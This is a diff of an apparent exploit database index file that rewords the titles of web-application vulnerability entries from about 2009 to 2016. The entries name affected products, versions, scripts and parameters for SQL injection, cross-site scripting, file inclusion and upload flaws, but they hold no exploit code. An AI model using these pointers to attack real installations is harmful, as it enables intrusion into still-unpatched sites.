Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 +33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33986,platforms/php/webapps/33986.txt,"PHP File Uploader - Arbitrary File Upload",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0 @@ -33956,22 +33957,22 @@ id,file,description,date,author,platform,type,port 33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - Local File Inclusion",2014-07-07,Vulnerability-Lab,ios,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 -34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 -34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34005,platforms/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34006,platforms/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 +34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34005,platforms/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34006,platforms/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 -34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 34014,platforms/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System - 'user.php' SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 -34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 -34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 -34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 +34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - 'gallery.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 +34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - 'image.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 +34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0 -34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0 +34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Multiple Cross-Site Scripting / SQL Injections",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 34025,platforms/php/webapps/34025.txt,"C99Shell (Web Shell) - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 @@ -33988,7 +33989,7 @@ id,file,description,date,author,platform,type,port 34042,platforms/php/webapps/34042.txt,"Ruubikcms 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 - 'webpages-form-led-edit.php' SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script - 'index.php' Cross-Site Scripting",2010-05-26,indoushka,php,webapps,0 -34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' Parameter SQL Injection",2010-05-27,"sniper ip",php,webapps,0 +34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",php,webapps,0 34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection",2010-05-28,"Christopher Schramm",php,webapps,0 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections",2010-05-28,"High-Tech Bridge SA",php,webapps,0 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0 @@ -33998,20 +33999,20 @@ id,file,description,date,author,platform,type,port 34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps,0 34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps,0 34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0 -34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0 +34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' SQL Injection",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 -34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 +34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 34078,platforms/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,php,webapps,0 34079,platforms/php/webapps/34079.txt,"Sniggabo CMS 2.21 - 'search.php' Cross-Site Scripting",2010-01-06,Sora,php,webapps,0 34080,platforms/cgi/webapps/34080.txt,"MoinMoin 1.x - 'PageEditor.py' Cross-Site Scripting",2010-06-03,anonymous,cgi,webapps,0 34081,platforms/php/webapps/34081.txt,"KubeLabs PHPDug 2.0 - 'upcoming.php' Cross-Site Scripting",2010-01-06,indoushka,php,webapps,0 34082,platforms/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 - 'display.php' Cross-Site Scripting",2010-01-02,kaMtiEz,php,webapps,0 -34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0 +34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Cross-Site Scripting",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0 40718,platforms/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0 @@ -34019,12 +34020,12 @@ id,file,description,date,author,platform,type,port 34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 - 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0 34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0 -34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 -34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - manage/main.php fld_path Parameter Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0 +34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - 'manage/add_user.php?user_id' SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 +34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - 'manage/main.php?fld_path' Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0 34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 -34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 -34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 +34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - 'showcasesearch.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 +34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - 'showcase2search.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 @@ -34036,9 +34037,9 @@ id,file,description,date,author,platform,type,port 34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 34113,platforms/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 -34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 -34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 -34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 +34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 +34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 +34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 @@ -34052,7 +34053,7 @@ id,file,description,date,author,platform,type,port 34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0 -34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 +34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 34168,platforms/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 @@ -34071,35 +34072,35 @@ id,file,description,date,author,platform,type,port 34195,platforms/php/webapps/34195.txt,"WordPress Plugin Cimy Counter 0.9.4 - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps,0 34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps,0 -34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution",2014-07-30,LiquidWorm,php,webapps,80 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 -34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 -34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0 -34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34213,platforms/php/webapps/34213.txt,"PHP Bible Search - bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 -34214,platforms/php/webapps/34214.txt,"PHP Bible Search - bible.php chapter Parameter Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 +34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 +34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' SQL Injection",2010-06-28,S.W.T,php,webapps,0 +34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34213,platforms/php/webapps/34213.txt,"PHP Bible Search - 'bible.php?chapter' SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 +34214,platforms/php/webapps/34214.txt,"PHP Bible Search - 'bible.php?chapter' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps,0 34216,platforms/php/webapps/34216.txt,"eBay Clone Script 2010 - 'showcategory.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",php,webapps,0 34217,platforms/php/webapps/34217.txt,"Clix'N'Cash Clone 2010 - 'index.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",php,webapps,0 34218,platforms/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 -34219,platforms/php/webapps/34219.txt,"CANDID - image/view.php image_id Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 -34220,platforms/php/webapps/34220.txt,"CANDID - image/view.php image_id Parameter Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 +34219,platforms/php/webapps/34219.txt,"CANDID - 'image/view.php?image_id' SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 +34220,platforms/php/webapps/34220.txt,"CANDID - 'image/view.php?image_id' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34221,platforms/asp/webapps/34221.txt,"Iatek PortalApp 3.3/4.0 - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",asp,webapps,0 34222,platforms/php/webapps/34222.html,"Grafik CMS - 'admin.php' SQL Injection / Cross-Site Scripting",2010-06-29,"High-Tech Bridge SA",php,webapps,0 34223,platforms/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 - 'index.pl' Remote Command Execution",2010-06-29,"Marshall Whittaker",cgi,webapps,0 34224,platforms/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,multiple,webapps,0 34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection / HTML Injection",2010-06-29,"Lucas Apa",php,webapps,0 34226,platforms/php/webapps/34226.txt,"System CMS Contentia - 'news.php' SQL Injection",2010-06-30,GlaDiaT0R,php,webapps,0 -34229,platforms/php/webapps/34229.txt,"ArcademSX 2.904 - 'cat' Parameter Cross-Site Scripting",2010-06-29,"Th3 RDX",php,webapps,0 +34229,platforms/php/webapps/34229.txt,"ArcademSX 2.904 - 'cat' Cross-Site Scripting",2010-06-29,"Th3 RDX",php,webapps,0 34231,platforms/php/webapps/34231.txt,"LiveZilla 3.1.8.3 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-30,MaXe,php,webapps,0 -34232,platforms/php/webapps/34232.txt,"DPScms - 'q' Parameter SQL Injection / Cross-Site Scripting",2010-07-01,Ariko-Security,php,webapps,0 -34234,platforms/php/webapps/34234.txt,"Flatnux 2010-06.09 - 'find' Parameter Cross-Site Scripting",2010-07-01,ITSecTeam,php,webapps,0 +34232,platforms/php/webapps/34232.txt,"DPScms - 'q' SQL Injection / Cross-Site Scripting",2010-07-01,Ariko-Security,php,webapps,0 +34234,platforms/php/webapps/34234.txt,"Flatnux 2010-06.09 - 'find' Cross-Site Scripting",2010-07-01,ITSecTeam,php,webapps,0 34235,platforms/php/webapps/34235.txt,"Wiki Web Help 0.2.7 - Cross-Site Scripting / HTML Injection",2010-07-01,"John Leitch",php,webapps,0 -34236,platforms/php/webapps/34236.txt,"ReCMS - 'users_lang' Parameter Directory Traversal",2010-07-01,Locu,php,webapps,0 +34236,platforms/php/webapps/34236.txt,"ReCMS - 'users_lang' Directory Traversal",2010-07-01,Locu,php,webapps,0 34237,platforms/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia and Maximiliano Soler",multiple,webapps,0 34238,platforms/php/webapps/34238.txt,"Sphider Search Engine - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 @@ -34119,7 +34120,7 @@ id,file,description,date,author,platform,type,port 34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (2)",2010-07-06,"Ivan Sanchez",php,webapps,0 34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 -34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Parameter Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 +34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34260,platforms/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34264,platforms/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 @@ -34133,21 +34134,21 @@ id,file,description,date,author,platform,type,port 34280,platforms/php/webapps/34280.txt,"phpFaber CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 - 'index.php' Cross-Site Scripting",2010-07-09,bi0,php,webapps,0 34283,platforms/php/webapps/34283.txt,"Model Agency Manager - 'search_process.php' Cross-Site Scripting",2009-12-13,bi0,php,webapps,0 -34284,platforms/php/webapps/34284.txt,"osCSS 1.2.2 - 'page' Parameter Cross-Site Scripting",2010-07-08,"High-Tech Bridge SA",php,webapps,0 -34285,platforms/php/webapps/34285.txt,"Articlems 2.0 - 'c[]' Parameter Cross-Site Scripting",2010-12-13,Packetdeath,php,webapps,0 +34284,platforms/php/webapps/34284.txt,"osCSS 1.2.2 - 'page' Cross-Site Scripting",2010-07-08,"High-Tech Bridge SA",php,webapps,0 +34285,platforms/php/webapps/34285.txt,"Articlems 2.0 - 'c[]' Cross-Site Scripting",2010-12-13,Packetdeath,php,webapps,0 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 - 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections",2009-12-22,"Hadi Kiamarsi",php,webapps,0 34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,php,webapps,0 -34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Parameter Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0 +34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0 34291,platforms/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 -34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0 +34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",java,webapps,0 34294,platforms/php/webapps/34294.txt,"WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34298,platforms/php/webapps/34298.py,"CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 -34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Parameter Local File Inclusion",2010-07-11,"John Leitch",php,webapps,0 +34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion",2010-07-11,"John Leitch",php,webapps,0 34300,platforms/php/webapps/34300.py,"CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0 34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - Local File Inclusion",2014-08-09,Vulnerability-Lab,ios,webapps,8000 @@ -34160,18 +34161,18 @@ id,file,description,date,author,platform,type,port 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps,0 